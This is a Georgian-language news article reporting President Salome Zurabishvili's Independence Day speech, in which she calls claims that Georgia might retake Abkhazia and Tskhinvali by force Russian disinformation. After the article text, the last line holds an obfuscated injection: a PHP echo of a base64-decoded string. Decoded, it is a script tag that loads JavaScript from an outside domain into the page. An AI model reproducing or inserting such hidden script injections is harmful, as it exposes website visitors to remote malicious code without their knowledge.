celsiusi
ავერსი საქკაბელი
ამ დაძაბულ გარემოში მცდელობაა, მოსახლეობას დააჯერონ, თითქოს საქართველომ შეიძლება, „დრო იხელთოს“ და ძალით ეცადოს ტერიტორიების დაბრუნება – ეს აშკარა მორიგი რუსული დეზინფორმაციაა, – ამის შესახებ საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა საქართველოს დამოუკიდებლობის დღისადმი მიძღვნილ ღონისძიებაზე სიტყვით გამოსვლისას განაცხადა.
 
სალომე ზურაბიშვილმა აფხაზეთსა და ცხინვალში მცხოვრებ მოქალაქეებს მიმართა, რომ საქართველო ომით და ძალით არაფერს დააპირებს მათ წინააღმდეგ.
 
„ჩვენს ოკუპირებულ ტერიტორიებზე გამოწვევები არ ნელდება და პირიქით, ამ დაძაბულ გარემოში მცდელობაა, მოსახლეობას დააჯერონ, თითქოს საქართველომ შეიძლება, „დრო იხელთოს“ და ძალით ეცადოს ტერიტორიების დაბრუნება – ეს აშკარა მორიგი რუსული დეზინფორმაციაა. კიდევ ერთხელ მოგმართავთ თქვენ, ჩვენს მოქალაქეებს აფხაზეთსა და ცხინვალში, გიდასტურებთ, რომ საქართველო ომით და ძალით არაფერს დააპირებს თქვენ წინააღმდეგ. დღეს, ყველასთვის ნათელია, რომელი ქვეყანა ემუქრება მისი მეზობლების სუვერენობას, იდენტობას და სიცოცხლეს. ეს საქართველო არაა. გთავაზობთ, რომ, როგორც წარსულში ერთად ვქმნიდით ქართულ სახელმწიფოს, ახლაც ერთად შევქმნათ თანასწორუფლებიანი მომავალი. გთავაზობთ ერთიან ევროპულ მომავალთან შემოერთებას. გთავაზობთ თავისუფლებას და თქვენი ენის, იდენტობის, ისტორიის, კულტურის პატივისცემასა და დაცვას. გთავაზობთ ახალ თანხმობას. ამ დროს რუსეთის კიდევ ერთი პროვოკაცია, რეფერენდუმის და ანექსიის მუქარა ვერ მიაღწევს ჩვენ შორის დაპირისპირების გაღვივებისა და მშვიდობიანი პოლიტიკიდან გადახვევის შედეგს. რუსეთმა კიდევ ერთი საბედისწერო შეცდომა და დანაშაული არ უნდა დაუშვას, და კიდევ ერთხელ არ უნდა სცადოს საერთაშორისო სამართლის ყველა ნორმების და პრინციპების აბუჩად აგდება. ეს უპასუხოდ არ დარჩება და გამოიწვევს საერთაშორისო თანამეგობრობისგან სათანადო რეაქციებს“, – აღნიშნა სალომე ზურაბიშვილმა.
 
 
 
 
608
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");